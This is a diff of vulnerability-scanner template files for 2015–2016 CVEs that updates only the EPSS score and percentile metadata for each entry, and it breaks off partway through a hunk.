metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index da1b9988c89..909903af5e4 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2068 cwe-id: CWE-79 epss-score: 0.05406 - epss-percentile: 0.89852 + epss-percentile: 0.89847 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 22eee441717..876d2346df8 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2196 cwe-id: CWE-89 epss-score: 0.02862 - epss-percentile: 0.8586 + epss-percentile: 0.85858 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 3051dfae094..365e178892a 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-2755 cwe-id: CWE-352 epss-score: 0.00693 - epss-percentile: 0.71358 + epss-percentile: 0.71334 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index dea8edb73ee..545386fd8cd 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-2794 cwe-id: CWE-264 epss-score: 0.92349 - epss-percentile: 0.99714 + epss-percentile: 0.99713 cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 427aa07be73..91ff62015a1 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-2863 cwe-id: CWE-601 epss-score: 0.46464 - epss-percentile: 0.9756 + epss-percentile: 0.97555 cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index d54cd6a5f22..9d8723033c5 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-3337 cwe-id: CWE-22 epss-score: 0.90729 - epss-percentile: 0.99599 + epss-percentile: 0.99598 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index 23a3aacb898..31fc4b6b53b 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-3648 cwe-id: CWE-22 epss-score: 0.45832 - epss-percentile: 0.97518 + epss-percentile: 0.97514 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index af0b8be0b7e..f6d1419a1e9 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-4062 cwe-id: CWE-89 epss-score: 0.25156 - epss-percentile: 0.96007 + epss-percentile: 0.96011 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index b00516401dc..b80dfa73670 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-4127 cwe-id: CWE-79 epss-score: 0.01716 - epss-percentile: 0.81927 + epss-percentile: 0.81925 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 34ccfebd91c..44d17e7b79e 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4414 cwe-id: CWE-22 epss-score: 0.09051 - epss-percentile: 0.92391 + epss-percentile: 0.92387 cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index db4729e19e8..b5071338480 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4666 cwe-id: CWE-22 epss-score: 0.16389 - epss-percentile: 0.9465 + epss-percentile: 0.94647 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 01ea8b56972..b2b2c6a84c4 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5354 cwe-id: CWE-601 epss-score: 0.21803 - epss-percentile: 0.95572 + epss-percentile: 0.95575 cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 410ef8dcf2b..cf568105671 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other epss-score: 0.1779 - epss-percentile: 0.94915 + epss-percentile: 0.94914 cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 9d438af33c6..fa8a149590f 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5469 cwe-id: CWE-22 epss-score: 0.4911 - epss-percentile: 0.97681 + epss-percentile: 0.97677 cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 29ab60154e7..2748ce9fea9 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-5471 cwe-id: CWE-22 epss-score: 0.41406 - epss-percentile: 0.97283 + epss-percentile: 0.97281 cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 4f343d54bc1..75d9369a055 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-6477 cwe-id: CWE-79 epss-score: 0.40551 - epss-percentile: 0.97234 + epss-percentile: 0.97232 cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index aa46853365e..4fc6f3e7246 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-6544 cwe-id: CWE-79 epss-score: 0.3629 - epss-percentile: 0.96979 + epss-percentile: 0.96978 cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 8c114cd7198..4d1b552c9e6 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-6920 cwe-id: CWE-79 epss-score: 0.00682 - epss-percentile: 0.7109 + epss-percentile: 0.7107 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index d2bbfab0d06..0ef8ff6014b 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-7377 cwe-id: CWE-79 epss-score: 0.05825 - epss-percentile: 0.90246 + epss-percentile: 0.90248 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index fa47ae83295..e659b511188 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-7780 cwe-id: CWE-22 epss-score: 0.36216 - epss-percentile: 0.96975 + epss-percentile: 0.96973 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index d5f27897a40..bf94c98d492 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other epss-score: 0.1267 - epss-percentile: 0.93765 + epss-percentile: 0.9376 cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 40a40750953..00ccbffc45e 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-8349 cwe-id: CWE-79 epss-score: 0.09843 - epss-percentile: 0.92753 + epss-percentile: 0.92747 cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-8350.yaml b/http/cves/2015/CVE-2015-8350.yaml index 89519f9c68d..66cf4ef959a 100644 --- a/http/cves/2015/CVE-2015-8350.yaml +++ b/http/cves/2015/CVE-2015-8350.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2015-8350 cwe-id: CWE-79 - epss-score: 0.00984 - epss-percentile: 0.76344 + epss-score: 0.00329 + epss-percentile: 0.55273 cpe: cpe:2.3:a:inboundnow:call_to_action:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 4cd74f7af38..da8f98ed145 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-8813 cwe-id: CWE-918 epss-score: 0.83448 - epss-percentile: 0.99253 + epss-percentile: 0.99252 cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-9406.yaml b/http/cves/2015/CVE-2015-9406.yaml index ae9be0476df..ec10cdb3b4f 100644 --- a/http/cves/2015/CVE-2015-9406.yaml +++ b/http/cves/2015/CVE-2015-9406.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-9406 cwe-id: CWE-22 epss-score: 0.81654 - epss-percentile: 0.99148 + epss-percentile: 0.9915 cpe: cpe:2.3:a:mtheme-unus_project:mtheme-unus:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9415.yaml b/http/cves/2015/CVE-2015-9415.yaml index 01db4e8587a..886d0d9e752 100644 --- a/http/cves/2015/CVE-2015-9415.yaml +++ b/http/cves/2015/CVE-2015-9415.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-9415 cwe-id: CWE-20 epss-score: 0.15525 - epss-percentile: 0.94461 + epss-percentile: 0.94459 cpe: cpe:2.3:a:angrycreative:bj_lazy_load:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9499.yaml b/http/cves/2015/CVE-2015-9499.yaml index fda89ae0b8f..897749975d7 100644 --- a/http/cves/2015/CVE-2015-9499.yaml +++ b/http/cves/2015/CVE-2015-9499.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-9499 cwe-id: CWE-434 epss-score: 0.67891 - epss-percentile: 0.98528 + epss-percentile: 0.9853 cpe: cpe:2.3:a:themepunch:showbiz_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index ef498c62504..c2ae236428b 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000126 cwe-id: CWE-79 epss-score: 0.02196 - epss-percentile: 0.83977 + epss-percentile: 0.83973 cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 9ee34f29500..f4b88200189 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000127 cwe-id: CWE-79 epss-score: 0.02196 - epss-percentile: 0.83977 + epss-percentile: 0.83973 cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index a3a6b5b9598..cdba523ecb2 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000129 cwe-id: CWE-79 epss-score: 0.02773 - epss-percentile: 0.85638 + epss-percentile: 0.85635 cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 0d9058a03df..4885a1fa22c 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000130 cwe-id: CWE-79 epss-score: 0.01668 - epss-percentile: 0.81682 + epss-percentile: 0.81676 cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index 63f296362eb..79aaef9d297 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000131 cwe-id: CWE-79 epss-score: 0.02155 - epss-percentile: 0.83822 + epss-percentile: 0.83815 cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 23553f9a885..edf1395231d 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000132 cwe-id: CWE-79 epss-score: 0.02422 - epss-percentile: 0.84726 + epss-percentile: 0.84724 cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 91fd3ffb015..b8e3486d1cf 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000134 cwe-id: CWE-79 epss-score: 0.02155 - epss-percentile: 0.83822 + epss-percentile: 0.83815 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index fcd47befe05..17a1f856eef 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000135 cwe-id: CWE-79 epss-score: 0.02155 - epss-percentile: 0.83822 + epss-percentile: 0.83815 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index ac89c8d5ac7..b619773f602 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000137 cwe-id: CWE-79 epss-score: 0.07251 - epss-percentile: 0.9137 + epss-percentile: 0.91368 cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 06b8649f6d2..bea8f4e83bd 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000142 cwe-id: CWE-79 epss-score: 0.07251 - epss-percentile: 0.9137 + epss-percentile: 0.91368 cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 549b3c27e23..189ec34d285 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000146 cwe-id: CWE-79 epss-score: 0.0204 - epss-percentile: 0.83384 + epss-percentile: 0.83381 cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index c68d3832464..a8cff33f059 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000148 cwe-id: CWE-79 epss-score: 0.09352 - epss-percentile: 0.9253 + epss-percentile: 0.92523 cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 489d01336ca..e036ed98137 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000149 cwe-id: CWE-79 epss-score: 0.07335 - epss-percentile: 0.91437 + epss-percentile: 0.91434 cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index e595d5e2600..a9ab160c57a 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000153 cwe-id: CWE-79 epss-score: 0.01868 - epss-percentile: 0.82639 + epss-percentile: 0.82636 cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index b4f9e7c622b..5e32ba9302a 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000154 cwe-id: CWE-79 epss-score: 0.05754 - epss-percentile: 0.90189 + epss-percentile: 0.9019 cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index a7d18459df6..a0848726771 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000155 cwe-id: CWE-79 epss-score: 0.02155 - epss-percentile: 0.83822 + epss-percentile: 0.83815 cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 126fb4d1903..24fd372c43e 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-10033 cwe-id: CWE-88 epss-score: 0.94457 - epss-percentile: 0.99992 + epss-percentile: 0.99991 cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index ae175157235..ddbabc17949 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-10108 cwe-id: CWE-77 epss-score: 0.91759 - epss-percentile: 0.99668 + epss-percentile: 0.99667 cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index b105ee07cef..d0dafda2fe5 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-10367 cwe-id: CWE-22 epss-score: 0.52468 - epss-percentile: 0.97841 + epss-percentile: 0.97838 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index db16e24e13e..3ccc998ae69 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-10368 cwe-id: CWE-601 epss-score: 0.01027 - epss-percentile: 0.76829 + epss-percentile: 0.7682 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index af3ebf7953f..26eaa0c902c 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-10940 cwe-id: CWE-89 epss-score: 0.13503 - epss-percentile: 0.94002 + epss-percentile: 0.93997 cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index b90f977a8eb..fd85f35d83c 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-10960 cwe-id: CWE-20 epss-score: 0.57085 - epss-percentile: 0.98059 + epss-percentile: 0.98057 cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 55b4250db03..22c20f9369f 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 epss-score: 0.00979 - epss-percentile: 0.76283 + epss-percentile: 0.76276 cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-10976.yaml b/http/cves/2016/CVE-2016-10976.yaml index 6ee51812bc6..272f3032f43 100644 --- a/http/cves/2016/CVE-2016-10976.yaml +++ b/http/cves/2016/CVE-2016-10976.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-10976 cwe-id: CWE-79 epss-score: 0.00656 - epss-percentile: 0.70483 + epss-percentile: 0.70463 cpe: cpe:2.3:a:kodebyraaet:safe_editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index b12741021eb..bba02a49e21 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -23,7 +23,7 @@ info: cwe-id: CWE-79 cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* epss-score: 0.01517 - epss-percentile: 0.80828 + epss-percentile: 0.80818 metadata: framework: wordpress max-request: 2 diff --git a/http/cves/2016/CVE-2016-15042.yaml b/http/cves/2016/CVE-2016-15042.yaml index 6ac24d12651..2b7f0fbd6ac 100644 --- a/http/cves/2016/CVE-2016-15042.yaml +++ b/http/cves/2016/CVE-2016-15042.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2016-15042 cwe-id: CWE-434 - epss-score: 0.70789 - epss-percentile: 0.98648 + epss-score: 0.71466 + epss-percentile: 0.98676 cpe: cpe:2.3:a:najeebmedia:frontend_file_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-15043.yaml b/http/cves/2016/CVE-2016-15043.yaml index 91af4d6367d..04f81b08a7a 100644 --- a/http/cves/2016/CVE-2016-15043.yaml +++ b/http/cves/2016/CVE-2016-15043.yaml @@ -18,7 +18,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-15043 - epss-score: 0.85359 + epss-score: 0.85353 epss-percentile: 0.99331 cwe-id: CWE-434 metadata: diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index faa9df438c8..77f1742bf9d 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2016-1555 cwe-id: CWE-77 - epss-score: 0.93967 - epss-percentile: 0.99877 + epss-score: 0.94016 + epss-percentile: 0.99887 cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 5461417cc2c..99cd099829e 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-4437 cwe-id: CWE-284 epss-score: 0.94214 - epss-percentile: 0.99918 + epss-percentile: 0.99916 cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index fc9f1151170..0c1071ec67f 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -21,7 